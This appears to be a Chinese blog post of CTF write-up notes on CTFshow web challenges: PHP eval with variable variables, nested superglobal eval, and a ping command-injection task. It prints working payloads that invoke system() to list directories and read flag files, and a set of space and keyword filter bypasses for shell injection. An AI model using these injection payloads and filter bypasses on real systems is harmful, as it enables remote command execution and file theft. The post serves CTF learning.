刷菜狗杯,总结了一些学到的知识点
我的眼里只有钱
源代码如下:
1 2 3 4 5 6 7
| <?php error_reporting(0); extract($_POST); eval($$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$_); highlight_file(__FILE__);
|
首先是eval函数,就是把里面的字符串当作命令执行,然后extract函数是将post里面的所有参数重叠在一起,然后最不懂的就是$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$_,实际类似于c语言中的指针,每个$符号就是将后面的字符串当成了一个新变量,因此可以使用post传参解决
1 2
| _=__&__=___&___=____&____=_____&_____=______&______=_______&_______=________&________=_________&_________=__________&__________=___________&___________=____________&____________=_____________&_____________=______________&______________=_______________&_______________=________________&________________=_________________&_________________=__________________&__________________=___________________&___________________=____________________&____________________=_____________________&_____________________=______________________&______________________=_______________________&_______________________=________________________&________________________=_________________________&_________________________=__________________________&__________________________=___________________________&___________________________=____________________________&____________________________=_____________________________&_____________________________=______________________________&______________________________=_______________________________&_______________________________=________________________________&________________________________=_________________________________&_________________________________=__________________________________&__________________________________=___________________________________&___________________________________=____________________________________&____________________________________=system('ls /')
|
签到题
1 2 3 4 5 6 7 8 9 10 11 12
| <?php
error_reporting(0); highlight_file(__FILE__);
eval($_REQUEST[$_GET[$_POST[$_COOKIE['CTFshow-QQ群:']]]][6][0][7][5][8][0][9][4][4]); http://d0255dc2-b1c4-4916-95b0-a3cfe0495d40.challenge.ctf.show/?b=c&c[0]=1&c[6][0][7][5][8][0][9][4][4]=system("cat /f1agaaa"); post: a=b cookie:CTFshow-QQ群:=a
|
Ping Ping Ping
首先先看看ping是什么:ping是一种计算机网络工具,用来测试数据包能否透过IP协议到达特定主机。ping的运作原理是向目标主机传出一个ICMP的请求回显数据包,并等待接收回显回应数据包。程序会按时间和成功响应的次数估算丢失数据包率(丢包率)和数据包往返时间(网络时延,Round-trip delay time)。(出自维基百科)
页面中提示ip=?,提示我们传入一个ping来获取值,因此可以在里面进行注入。输入?ip=1.1.1.1;ls,发现目录下的flag.php文件,再次进行注入?ip=1.1.1.1;cat flag.php,发现空格和flag都被过滤掉了,因此采用以下的注入方式
1 2 3 4 5 6
| //空格绕过 cat${IFS}flag.txt cat$IFS$9flag.txt (正整数可以是任意) cat<flag.txt cat<>flag.txt {cat,flag.txt}
|
1 2 3
| //字段绕过 可以使用定义变量绕过 x = a g f a x=ag fax=agfax=flag
|
综上URL?ip=0;x=ag;cat$IFS$1fl$x.php
强网杯2019随便注入
算了我直接上url吧https://blog.csdn.net/Leaf_initial/article/details/130096560?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522169958638916800225527898%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=169958638916800225527898&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-2-130096560-null-null.142^v96^pc_search_result_base3&utm_term=%E5%BC%BA%E7%BD%91%E6%9D%AF2019&spm=1018.2226.3001.4187